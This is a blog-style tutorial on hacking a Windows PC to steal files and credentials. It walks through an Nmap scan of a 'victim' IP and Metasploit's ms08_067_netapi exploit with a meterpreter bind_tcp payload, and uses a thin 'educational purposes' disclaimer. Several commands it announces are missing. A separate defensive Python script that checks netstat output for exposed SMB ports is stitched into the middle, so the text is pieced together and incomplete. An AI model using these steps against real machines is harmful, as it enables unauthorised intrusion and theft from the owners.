Hey guys, today in this article I am going to talk about hacking a computer using Metasploit. I think I have already mentioned Metasploit in one of my articles. Here I will give a general description of how it works and how to use it efficiently to hack into a PC and steal credentials.
But remember, this is only for educational purposes, and hence damaging any victim's computer is at your own risk.
Note: The hacker can be traced, and hence additional techniques are required to keep yourself safe!
So here go the requirements and the procedure to hack into a PC.
- Metasploit (Available at metasploit.org)
- Nmap (Port scanner available at nmap.org)
- Debian Linux OS
- IP of the victim’s computer.
Introduction to attack:
Nmap is a port scanner used to scan a computer and locate its open ports. The ports are the path for the information that we need to steal. On a normal computer, usually 30-40 ports are kept open. To find the number of ports open on your own computer, open the command prompt (Start > Command prompt) and type
netstat -ano and hit enter; you will get a list of open ports on your computer. You need basic knowledge of ports and port numbers to perform this attack.
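The netstat -ano listing can also be read from the defender's side. The following is an added example, not code from the original article: it parses that output and reports any listener on ports 139 or 445 (the ports the scan step of this procedure looks for) that is reachable from the network. The sample output and the function names are constructed for illustration.

```python
import re

# Ports the article's scan step looks for (NetBIOS session service and SMB).
SMB_PORTS = {139, 445}

# Constructed sample of `netstat -ano` output (not captured from a real host).
SAMPLE = """\
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       912
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    192.168.1.20:139       0.0.0.0:0              LISTENING       4
  TCP    127.0.0.1:5354         0.0.0.0:0              LISTENING       2104
  TCP    192.168.1.20:49712     93.184.216.34:443      ESTABLISHED     5520
  TCP    [::]:445               [::]:0                 LISTENING       4
  UDP    0.0.0.0:5353           *:*                                    2104
"""

# Proto, local address:port, foreign address, state, PID. Only TCP rows in
# LISTENING state match; the greedy address group also handles "[::]:445".
LINE = re.compile(r"^\s*TCP\s+(\S+):(\d+)\s+\S+\s+LISTENING\s+(\d+)\s*$")

def is_loopback(addr):
    """True if the socket is bound to a loopback address only."""
    return addr.startswith("127.") or addr == "[::1]"

def listening_sockets(netstat_text):
    """Return (address, port, pid) for every TCP socket in LISTENING state."""
    found = []
    for line in netstat_text.splitlines():
        m = LINE.match(line)
        if m:
            found.append((m.group(1), int(m.group(2)), int(m.group(3))))
    return found

def exposed_smb(netstat_text):
    """Listeners on 139/445 that are not restricted to loopback."""
    return [s for s in listening_sockets(netstat_text)
            if s[1] in SMB_PORTS and not is_loopback(s[0])]

if __name__ == "__main__":
    for addr, port, pid in exposed_smb(SAMPLE):
        print(f"port {port} listening on {addr} (PID {pid}): "
              "block it at the host firewall or disable it if unused")
```

A host that reports nothing here would not pass the "ports 139 and 445 open" check that the rest of the procedure depends on.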
Using a tool such as Metasploit, we can break into the PC and steal information through the corresponding port using commands. Learn to use Metasploit at http://www.metasploit.com/learn-more/how-do-i-use-it/.
We use Linux because it is the best OS for hackers. You must also know how to use the terminal on Linux, since we perform this attack from the command line.
Step 1: First we are going to port scan the computer. For this we need to open Nmap and type the following command.
nmap -sS -O <ip>
In place of <ip> you have to write the victim's IP address. If you see the ports 139 and 445 open, then you can go ahead.
Step 2: Now we have to open Metasploit (via terminal) and run it.
Type the following command to get the exploits in the victim’s computer.
You will get a list of exploits in the victim's computer, which look similar to ms05_039_pnp. Every such exploit corresponds to a different function. We are interested in the exploit that looks like this: ms08_067_netapi. So we give a command as shown below.
Step 3: Now we use the RHOST command to set the target IP.
And the RPORT command to access port 445.
set RPORT 445
Step 4: And now we give the commands
set SMBPIPE SRVSVC
set TARGET 0
Step 5: Now we have to set the payload, hence the following command.
set PAYLOAD windows/meterpreter/bind_tcp
Step 6: Time for the BIG BANG…! Type exploit and hit enter.
If you see a message that looks like “Meterpreter session 1 opened”, then you are done. You have successfully hacked into the computer.
Now, by using different commands, we can steal the files on that system!